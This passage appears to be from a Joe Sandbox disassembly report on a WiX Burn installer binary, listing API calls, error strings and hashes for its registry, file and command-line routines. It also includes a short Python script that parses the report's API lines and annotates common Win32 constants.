• String ID: %04u%02u%02u$Failed to write %ls value.$Failed to write software tags.$Failed to write update registration.$InstallDate$d:\a\wix4\wix4\src\burn\engine\registration.cpp
• API String ID: 3903209405-1589291871
APIs
• lstrlenW.KERNEL32(00000000), ref: 0091A67C
Similarity
• API ID: lstrlen
• String ID: Failed to allocate buffer for escaped string.$Failed to append characters.$Failed to append escape sequence.$Failed to copy string.$Failed to format escape sequence.$[\%c]$[]{}$d:\a\wix4\wix4\src\burn\engine\variable.cpp
• API String ID: 1659193697-948137518
APIs
• type_info::operator==.LIBVCRUNTIME ref: 0095A390
• ___TypeMatch.LIBVCRUNTIME ref: 0095A49E
• _UnwindNestedFrames.LIBCMT ref: 0095A5F0
• CallUnexpected.LIBVCRUNTIME ref: 0095A60B
Similarity
• API ID: CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
• String ID: csm$csm$csm
• API String ID: 2751267872-393685449
APIs
• CompareStringW.KERNEL32(00000000,00000000,0097E860,000000FF,00000000,000000FF,00000000,00000000,?,00916CF2,00000000), ref: 00948482
Strings
• Failed to plan action for target product., xrefs: 0094852F
• Failed to insert execute action., xrefs: 009484E7
• Failed to grow array of ordered patches., xrefs: 0094864E
• d:\a\wix4\wix4\src\burn\engine\mspengine.cpp, xrefs: 00948541
• Failed to copy target product code., xrefs: 009485AD
• Failed to get msp ui options., xrefs: 009485F5
Similarity
• API ID: CompareString
• String ID: Failed to copy target product code.$Failed to get msp ui options.$Failed to grow array of ordered patches.$Failed to insert execute action.$Failed to plan action for target product.$d:\a\wix4\wix4\src\burn\engine\mspengine.cpp
• API String ID: 1825529933-3199010431
APIs
• CompareStringW.KERNEL32(0000007F,00000001,00000001,00000000,?,00000000,?,7FFFFFFF,00000000,00000001,7FFFFFFF,00000000,00000009,00000000,feclient.dll,?), ref: 0091C6C7
• CompareStringW.KERNEL32(0000007F,00000001,00000001,00000000,?,00000000,?,7FFFFFFF,00000000,00000001,7FFFFFFF,00000000,00000009,00000000,feclient.dll,?), ref: 0091C72F
• CompareStringW.KERNEL32(0000007F,00000001,00000001,00000000,?,00000000,?,7FFFFFFF,00000000,00000001,7FFFFFFF,00000000,00000009,00000000,feclient.dll,?), ref: 0091C763
Strings
Similarity
• API ID: CompareString
• String ID: Failed to get length of left string: %ls$Failed to get length of right string: %ls$d:\a\wix4\wix4\src\burn\engine\condition.cpp$feclient.dll
• API String ID: 1825529933-1973728300
APIs
  • Part of subcall function 00974F04: lstrlenW.KERNEL32(00917162,00916DEA,?,?,?,00975488,00917162,00916DEA,00916EC2,00916DEA,00916DEA,?,?,?,00930D28,0D8C6817), ref: 00974F2A
• RegCloseKey.ADVAPI32(00916EDE,00916DEA,00916DEA,00020019,00916EDE,00917162,00916DEA,00916EC2,00916DEA,00916DEA,?,?,?,00930D28,0D8C6817,8B000137), ref: 009755BC
Strings
• Failed to get the id for the dependency "%ls"., xrefs: 00975521
• Failed to get the version for the dependency "%ls"., xrefs: 0097559B
• d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\deputil.cpp, xrefs: 009755A7
• Failed to allocate the registry key for dependency "%ls"., xrefs: 0097548F
• Failed to get the name for the dependency "%ls"., xrefs: 0097555E
• Failed to open the registry key for the dependency "%ls"., xrefs: 009754D8
Similarity
• API ID: Closelstrlen
• String ID: Failed to allocate the registry key for dependency "%ls".$Failed to get the id for the dependency "%ls".$Failed to get the name for the dependency "%ls".$Failed to get the version for the dependency "%ls".$Failed to open the registry key for the dependency "%ls".$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\deputil.cpp
• API String ID: 3903209405-4075874421
APIs
• MoveFileExW.KERNEL32(?,?,00000000,80004005,?,?,?,00973404,?,?,00000000,?,?,00000000), ref: 00973294
• GetLastError.KERNEL32(00000000,?,?,00973404,?,?,00000000,?,?,00000000,?,?,0092C66A,?,?,00000001), ref: 009732A3
  • Part of subcall function 0097343B: FindFirstFileW.KERNEL32(00916DEA,?,00916DEA,00916DEA,00000000), ref: 00973476
  • Part of subcall function 0097343B: FindClose.KERNEL32(00000000), ref: 00973482
• MoveFileExW.KERNEL32(?,?,00000000,?,00000000,?,?,00973404,?,?,00000000,?,?,00000000), ref: 0097335E
• GetLastError.KERNEL32(?,?,00973404,?,?,00000000,?,?,00000000,?,?,0092C66A,?,?,00000001,00000001), ref: 00973368
Strings
Similarity
• API ID: File$ErrorFindLastMove$CloseFirst
• String ID: d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\fileutil.cpp$failed to create directory while moving file: '%ls' to: '%ls'$failed to move file: '%ls' to: '%ls'
• API String ID: 3479031965-4053860161
APIs
• RegCloseKey.ADVAPI32(00000000,00916CF2,00000000,00000000,00000001,00000000,00000000,00000390,000000F8,00916CF2,009331C1,00000000,00000000,8D18C483,5350F845,00020006), ref: 00929A73
  • Part of subcall function 00927A4E: RegCloseKey.ADVAPI32(00000000,?,SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce,00020006,00000000), ref: 00927CDA
Strings
• Failed to update resume mode., xrefs: 00929A4B
• Failed to update name and publisher., xrefs: 00929ACB
• Failed to open registration key., xrefs: 00929A9B
• d:\a\wix4\wix4\src\burn\engine\registration.cpp, xrefs: 00929A10, 00929A5D
• Failed to update estimated size., xrefs: 00929AFA
• Failed to delete registration key: %ls, xrefs: 009299FE
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Close
                                                                                                                                                                  • String ID: Failed to delete registration key: %ls$Failed to open registration key.$Failed to update estimated size.$Failed to update name and publisher.$Failed to update resume mode.$d:\a\wix4\wix4\src\burn\engine\registration.cpp
                                                                                                                                                                  • API String ID: 3535843008-4174111784
                                                                                                                                                                  • Opcode ID: 7890c2560d6fa2ce0f8e37ea0a357d2d46e9838f6087fcd8057d2f05229320f1
                                                                                                                                                                  • Instruction ID: f28a455e8a023c369ae71d50d83e55dc1417e88c3e5e3f304a3ef8b9d70a1fd8
                                                                                                                                                                  • Opcode Fuzzy Hash: 7890c2560d6fa2ce0f8e37ea0a357d2d46e9838f6087fcd8057d2f05229320f1
                                                                                                                                                                  • Instruction Fuzzy Hash: 53310632A44735BBDF23AEA09C06FEFBA29AF45B10F100150FA0475194D7B19A60E7D1
Strings
• Failed to check the dictionary of unique dependencies., xrefs: 009306B1
• Failed to add "%ls" to the list of dependencies to ignore., xrefs: 0093074E
• d:\a\wix4\wix4\src\burn\engine\dependency.cpp, xrefs: 00930676, 009306C3, 00930760
• ALL, xrefs: 00930702
• Failed to add "%ls" to the string dictionary., xrefs: 0093073A
• Failed to create the string dictionary., xrefs: 00930664
Memory Dump Source
• Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
• Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
Similarity
• API ID:
• String ID: ALL$Failed to add "%ls" to the list of dependencies to ignore.$Failed to add "%ls" to the string dictionary.$Failed to check the dictionary of unique dependencies.$Failed to create the string dictionary.$d:\a\wix4\wix4\src\burn\engine\dependency.cpp
• API String ID: 0-461799926
• Opcode ID: 7c9127d61cbf3dba0228c6b06b39cd99a67ca77bffb2b7ade3f3115321196ffb
• Instruction ID: df10d1f1e9a5c313922b68a423c280397af49b52dea6b1eb99ad7f512c9318d7
• Opcode Fuzzy Hash: 7c9127d61cbf3dba0228c6b06b39cd99a67ca77bffb2b7ade3f3115321196ffb
• Instruction Fuzzy Hash: 6E31CBB1A85328B6DB2166548C5BF9F3968DBC1F64F100250FA05BA2C2E2F06D509FB1
APIs
• RegCloseKey.ADVAPI32(00000000,-80000001,?,00020019,?,?,?,00000000,?,?,?,?,00940576,?,00000000,8000FFFF), ref: 00940415
Strings
• SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\, xrefs: 0094033A
• QuietUninstallString, xrefs: 009403C6
• d:\a\wix4\wix4\src\burn\engine\bundlepackageengine.cpp, xrefs: 009403AD, 009403FF
• Failed to read QuietUninstallString., xrefs: 009403ED
• Failed to open registry key: %ls., xrefs: 0094039B
• Failed to build full key path., xrefs: 0094034A
Memory Dump Source
• Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
• Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
Similarity
• API ID: Close
• String ID: Failed to build full key path.$Failed to open registry key: %ls.$Failed to read QuietUninstallString.$QuietUninstallString$SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\$d:\a\wix4\wix4\src\burn\engine\bundlepackageengine.cpp
• API String ID: 3535843008-1706903631
• Opcode ID: 7f8e1212a61316a244fad932483d16a746d73cfd02bbaf701bb5704c6536a730
• Instruction ID: 4127126b6f5749a14675c7b41ba99bffdce4eb7f5c2693d9b9082290dfe96501
• Opcode Fuzzy Hash: 7f8e1212a61316a244fad932483d16a746d73cfd02bbaf701bb5704c6536a730
• Instruction Fuzzy Hash: 45313872A40316FFDF319F988C42F9FBFA89F84B00F154529FA45B6291E2B19D908690
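The APIs line in the record above lists sixteen values for RegCloseKey, which takes a single HKEY. The plugin prints a snapshot of stack slots at the call site, so only the first slot is the call's real parameter; the rest are leftovers from the surrounding frame, which is exactly why HKEY_CURRENT_USER (0x80000001), KEY_READ (0x00020019) and E_UNEXPECTED (0x8000FFFF) surface in a RegCloseKey line that reads the Uninstall key. The Python below is an added example, not Joe Sandbox code, that parses these lines and flags the well-known Win32 values; SAMPLE_LINES are copied from the records on this page, ARITY is the stdcall parameter count of each API, and the reading of "-80000001" as 0x80000001 is an assumption about how the plugin prints that value.

```python
"""Parse the 'APIs' lines of a Joe Sandbox function record and flag well-known Win32 values.

Added example, not code from Joe Sandbox or from the sample. The line format
(API.MODULE(slot,slot,...), ref: ADDR) and SAMPLE_LINES are copied from the
report; the constant names come from winreg.h / winerror.h. Assumption: the
slot list is a snapshot of stack dwords at the call site, so only the first
ARITY[api] slots are the call's real parameters and the rest are leftovers
from the caller's frame (still useful as hints, e.g. an HKEY or an HRESULT).
"""
import re
from dataclasses import dataclass

# Constructed from the APIs lines printed in the records (not a live capture).
SAMPLE_LINES = [
    "RegCloseKey.ADVAPI32(00000000,-80000001,?,00020019,?,?,?,00000000,?,?,?,?,00940576,?,00000000,8000FFFF), ref: 00940415",
    "RegCloseKey.ADVAPI32(00000000,d:\\a\\wix4\\wix4\\src\\libs\\dutil\\wixtoolset.dutil\\butil.cpp,0000011E,80070057,?,?,?), ref: 009774BC",
    "GetProcessHeap.KERNEL32(00000000,?,?,?,00000000,?,?,?,00911CD0,?,00000105,00000000,?,00000000,?,?), ref: 00915832",
    "_memcpy_s.LIBCMT ref: 009158BD",
]

# Real parameter counts (stdcall arity) for the APIs seen in these records.
ARITY = {
    "RegCloseKey": 1, "RegSetValueExW": 6, "RegDeleteValueW": 2,
    "GetProcessHeap": 0, "HeapReAlloc": 4, "RtlAllocateHeap": 3,
    "CommandLineToArgvW": 2, "GetLastError": 0, "_memcpy_s": 4,
}

# Win32 constants worth recognising when they appear in a slot.
KNOWN = {
    0x80000001: "HKEY_CURRENT_USER",
    0x80000002: "HKEY_LOCAL_MACHINE",
    0x00020019: "KEY_READ",
    0x8000FFFF: "E_UNEXPECTED",
    0x80070057: "E_INVALIDARG",
}

API_RE = re.compile(
    r"^(?P<api>\w+)\.(?P<module>[\w.]+)"
    r"(?:\((?P<args>.*)\),)?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)$"
)
HEX32 = re.compile(r"[0-9A-Fa-f]{8}")


@dataclass
class ApiCall:
    api: str
    module: str
    ref: int      # address of the call instruction in the dump
    slots: list   # raw slot strings exactly as printed
    params: list  # annotated real parameters (first ARITY[api] slots)


def slot_value(slot: str):
    """Integer value of a slot, or None for '?' and inlined strings such as a __FILE__ path.
    The report prints one HKEY as '-80000001'; assumed here to mean 0x80000001."""
    tok = slot.lstrip("-")
    return int(tok, 16) if HEX32.fullmatch(tok) else None


def annotate(slot: str) -> str:
    v = slot_value(slot)
    if v is None:
        return slot
    name = KNOWN.get(v)
    return f"0x{v:08X}" + (f" ({name})" if name else "")


def parse_api_line(line: str) -> ApiCall:
    m = API_RE.match(line.strip())
    if not m:
        raise ValueError(f"not a Joe Sandbox API line: {line!r}")
    args = m.group("args")
    slots = args.split(",") if args else []
    n = ARITY.get(m.group("api"), 0)  # unknown API: trust no slot as a parameter
    return ApiCall(m.group("api"), m.group("module"), int(m.group("ref"), 16),
                   slots, [annotate(s) for s in slots[:n]])


def residue_hints(call: ApiCall) -> dict:
    """Map slot index -> constant name for every recognised value, including the
    stale slots beyond the API's arity, where the caller's HKEY or HRESULT shows up."""
    return {i: KNOWN[v] for i, s in enumerate(call.slots)
            if (v := slot_value(s)) is not None and v in KNOWN}


if __name__ == "__main__":
    for call in map(parse_api_line, SAMPLE_LINES):
        print(f"{call.ref:08X} {call.module}!{call.api}{tuple(call.params)} hints={residue_hints(call)}")
```

Treat the hints as leads, not facts: a residual E_INVALIDARG in the butil.cpp line says an earlier call in that frame failed with that HRESULT, but which call has to be confirmed in the disassembly at the ref address.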
APIs
• RegCloseKey.ADVAPI32(00000000,d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\butil.cpp,0000011E,80070057,?,?,?), ref: 009774BC
Strings
Memory Dump Source
• Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
• Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
Similarity
• API ID: Close
• String ID: An invalid parameter was passed to the function.$Failed to locate and query bundle variable.$Failed to read string shared variable.$Reading bundle variable of type 0x%x not implemented.$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\butil.cpp$variables
• API String ID: 3535843008-2641142750
• Opcode ID: 39cbb2c30bb71dffd9d4f064f608ebbf2838259d8e429c955d701d6623ddbdee
• Instruction ID: d1ce941dd6bb35bf496309571fdd993e932bf576b133096e6c256c2ed5fb1278
• Opcode Fuzzy Hash: 39cbb2c30bb71dffd9d4f064f608ebbf2838259d8e429c955d701d6623ddbdee
• Instruction Fuzzy Hash: B531F733E48218B7C7215DD58C49FAFFE7EDB81754F04C165B609B62A1D2758E00C6E0
APIs
• GetProcessHeap.KERNEL32(00000000,?,?,?,00000000,?,?,?,00911CD0,?,00000105,00000000,?,00000000,?,?), ref: 00915832
• HeapReAlloc.KERNEL32(00000000,?,00911CD0,?,00000105,00000000,?,00000000,?,?,?,?,009129D8,?,?,00000000), ref: 00915839
  • Part of subcall function 0091540B: GetProcessHeap.KERNEL32(?,00000000,?,00915532,00000000,00000001,?,00000000,?,?,00000000,?,?,00000000,?,?), ref: 0091541C
  • Part of subcall function 0091540B: RtlAllocateHeap.NTDLL(00000000,?,00915532,00000000,00000001,?,00000000,?,?,00000000,?,?,00000000,?,?), ref: 00915423
• _memcpy_s.LIBCMT ref: 009158BD
Strings
Memory Dump Source
• Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
• Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
Similarity
• API ID: Heap$Process$AllocAllocate_memcpy_s
• String ID: Failed to get current memory size.$Failed to get new memory size.$Failed to reallocate memory$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\memutil.cpp
• API String ID: 3866612605-1266056832
• Opcode ID: ff86f3b7a7ec6ea65dbe38ad3c333d6490d1dd70485f61ee7e0cb0f2a8462190
• Instruction ID: 48d0d150cfd875c21545a0829aa6e0a0c1b9b6331d89fcb1d228c318a6562488
• Opcode Fuzzy Hash: ff86f3b7a7ec6ea65dbe38ad3c333d6490d1dd70485f61ee7e0cb0f2a8462190
• Instruction Fuzzy Hash: 8231E732B40B0DFBEB11AE54CC45FEF3A69DBC0760F134164F904AA291D6B1CD91A7A0
APIs
• RegSetValueExW.ADVAPI32(?,?,0096D811,00916CF2,009331C1,009331C1,00000001,?,009279A8,009331C1,DisplayName,00000000,00916CF2,009331C1,00000000,00916CF2), ref: 0096C42D
• RegDeleteValueW.ADVAPI32(?,?,0096D811,00916CF2,009331C1,009331C1,00000001,?,009279A8,009331C1,DisplayName,00000000,00916CF2,009331C1,00000000,00916CF2), ref: 0096C47F
Strings
Memory Dump Source
• Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
• Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
Similarity
• API ID: Value$Delete
• String ID: DisplayName$Failed to delete registry value: %ls$Failed to determine length of registry value: %ls$Failed to set registry value: %ls$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\regutil.cpp
• API String ID: 1738766685-322587201
• Opcode ID: 16cffa69b71937da71e8b5153261c4b9addf4e7ca8a8924178ea9e730bfb7278
• Instruction ID: 86da3b0732290d54ecbe046919bb5250088484f29ab768d8be738ad94ead51f8
• Opcode Fuzzy Hash: 16cffa69b71937da71e8b5153261c4b9addf4e7ca8a8924178ea9e730bfb7278
• Instruction Fuzzy Hash: 22210AB7204229B7EB119B158C15FBF3A6DDFC6760F158025FE59AB2A0DE30CD0296B0
APIs
• CommandLineToArgvW.SHELL32(00000000,00916570,00000000,00916570,00000000,00000000,ignored ,00000000,00000000,00000000,?,?,?,00917B19,00000000,?), ref: 009699E1
• GetLastError.KERNEL32(?,?,?,00917B19,00000000,?,?,00000003,00000000,00916570,00000000,?,?,?,?,?), ref: 009699EB
Strings
Memory Dump Source
• Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
• Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
Similarity
• API ID: ArgvCommandErrorLastLine
• String ID: Failed to copy command line.$Failed to initialize command line.$Failed to parse command line.$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\app2util.cpp$ignored
• API String ID: 3459693003-1494111247
• Opcode ID: 407fdb44810c0593d5e268efd48d4ed401eaa3bcc7430ccc17ddb9f6447a5e6f
                                                                                                                                                                  • Instruction ID: eadcb31429d68a8d146eff486bef501848f6c7260ab42132b045b13f46b85f39
                                                                                                                                                                  • Opcode Fuzzy Hash: 407fdb44810c0593d5e268efd48d4ed401eaa3bcc7430ccc17ddb9f6447a5e6f
                                                                                                                                                                  • Instruction Fuzzy Hash: 5121AA76A41228BBD7219B958C0BF9F7AACEB91B94F014055FE04BB291E6709E40D6D0
APIs
  • Part of subcall function 0097343B: FindFirstFileW.KERNEL32(00916DEA,?,00916DEA,00916DEA,00000000), ref: 00973476
  • Part of subcall function 0097343B: FindClose.KERNEL32(00000000), ref: 00973482
• SetFileAttributesW.KERNEL32(0094E626,00000080,00000000,0094E626,000000FF,00000000,00000000,?,?,0094E626), ref: 009731E0
• GetLastError.KERNEL32(?,?,0094E626), ref: 009731EA
• DeleteFileW.KERNEL32(0094E626,00000000,0094E626,000000FF,00000000,00000000,?,?,0094E626), ref: 00973223
• GetLastError.KERNEL32(?,?,0094E626), ref: 0097322D
Strings
Memory Dump Source
• Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
• Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
Similarity
• API ID: File$ErrorFindLast$AttributesCloseDeleteFirst
• String ID: Failed to delete file: %ls$Failed to remove attributes from file: %ls$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\fileutil.cpp
• API String ID: 3967264933-3778428042
• Opcode ID: 416a32c36badf409648dc4a325e578ca645abae870e41b28eba3c0d48cd7179d
• Instruction ID: a953f9e9f0aa490fa0eeaba558dcb63dc3d1bd7f50b49fe0ad093b2a6ffbf983
• Opcode Fuzzy Hash: 416a32c36badf409648dc4a325e578ca645abae870e41b28eba3c0d48cd7179d
• Instruction Fuzzy Hash: 9F11D373B45329B3D33152699C4AFAFA95C9F85BA4F01C210FD2DB61D29660CE00A5F0
APIs
• GetProcAddress.KERNEL32(PathAllocCanonicalize,api-ms-win-core-path-l1-1-0.dll), ref: 00971B7E
• GetLastError.KERNEL32(?,?,00971D45,00000000,00000001,00000003,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00971B8D
Strings
Memory Dump Source
• Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
• Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
Similarity
• API ID: AddressErrorLastProc
• String ID: Failed to get address of PathAllocCanonicalize.$Failed to load api-ms-win-core-path-l1-1-0.dll$PathAllocCanonicalize$api-ms-win-core-path-l1-1-0.dll$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\path2utl.cpp
• API String ID: 199729137-1104870970
• Opcode ID: 238bdbe07f148c4782af0bf99afe1a35ff0a10700e26080f672473a3d0d531f5
• Instruction ID: 839a65bd9e41f6f40b8aa21cadaf23d711c44ebe96997ddd649150c0700a865f
• Opcode Fuzzy Hash: 238bdbe07f148c4782af0bf99afe1a35ff0a10700e26080f672473a3d0d531f5
• Instruction Fuzzy Hash: 60113673B9233173D335125C6C0AF676AC89BC6BA4F128629BD09BF2E5F2E44C8151D0
APIs
  • Part of subcall function 00911839: LoadLibraryExW.KERNEL32(?,00000000,00000800,00000000,?,00911645,?,?,?,?,?,?,0091115A,cabinet.dll,00000009,?), ref: 00911855
  • Part of subcall function 00911839: GetLastError.KERNEL32(?,00911645,?,?,?,?,?,?,0091115A,cabinet.dll,00000009,?,?,00000000), ref: 00911866
• GetProcAddress.KERNEL32(SRSetRestorePointW,srclient.dll), ref: 0096E0B5
• GetLastError.KERNEL32(?,00916FBB,00000001,?,?,Function_000069E0,?), ref: 0096E0C4
Strings
Memory Dump Source
• Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
• Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
Similarity
• API ID: ErrorLast$AddressLibraryLoadProc
• String ID: Failed to find set restore point proc address.$Failed to initialize security for COM to talk to system restore.$SRSetRestorePointW$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\srputil.cpp$srclient.dll
• API String ID: 1866314245-3391705418
• Opcode ID: 78b0309cd36bc0f55c50193538d07103abb68af7e19b6050437ff3de0477da1c
• Instruction ID: 33db53c802c9d90c447ffb897a36b6a5eb0e76fac15b01df74f2a477e336e906
• Opcode Fuzzy Hash: 78b0309cd36bc0f55c50193538d07103abb68af7e19b6050437ff3de0477da1c
• Instruction Fuzzy Hash: 3A11C63AFC963973D33226589C0EB5A29189B93B64F070525FE047A6D1E5B19C80A1E1
APIs
• GetModuleHandleW.KERNEL32(kernel32,Wow64DisableWow64FsRedirection,00916DEA,00000000,?,00920CFC,00916DEE,00916DEA,?,0092066B,00917162,00917162,00916DEA,00000000,00917162,00000000), ref: 0096B711
• GetProcAddress.KERNEL32(00000000), ref: 0096B718
• GetLastError.KERNEL32(?,00920CFC,00916DEE,00916DEA,?,0092066B,00917162,00917162,00916DEA,00000000,00917162,00000000,00916DEA,00916CF2,00917162,00916DEA), ref: 0096B741
Strings
Memory Dump Source
• Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
• Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
Similarity
• API ID: AddressErrorHandleLastModuleProc
• String ID: Failed to disable file system redirection.$Wow64DisableWow64FsRedirection$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\procutil.cpp$kernel32
• API String ID: 4275029093-2679686115
• Opcode ID: da61520543bbb49b5b9ac506994adf7a3c18d9a4de3c91456eef135a484c1507
• Instruction ID: 5c9d8612c46de5b9dcfa035b34cee7d6d0d2fafedadeffabd987c2d62ddace18
• Opcode Fuzzy Hash: da61520543bbb49b5b9ac506994adf7a3c18d9a4de3c91456eef135a484c1507
• Instruction Fuzzy Hash: 7301D87B65532977D32026549C89F5B695C9BC5760F020165FE19EB281F774CC8152E0
APIs
  • Part of subcall function 00911839: LoadLibraryExW.KERNEL32(?,00000000,00000800,00000000,?,00911645,?,?,?,?,?,?,0091115A,cabinet.dll,00000009,?), ref: 00911855
  • Part of subcall function 00911839: GetLastError.KERNEL32(?,00911645,?,?,?,?,?,?,0091115A,cabinet.dll,00000009,?,?,00000000), ref: 00911866
• GetProcAddress.KERNEL32(RegDeleteKeyExW,AdvApi32.dll), ref: 0096C8FF
• GetProcAddress.KERNEL32(RegGetValueW), ref: 0096C915
Strings
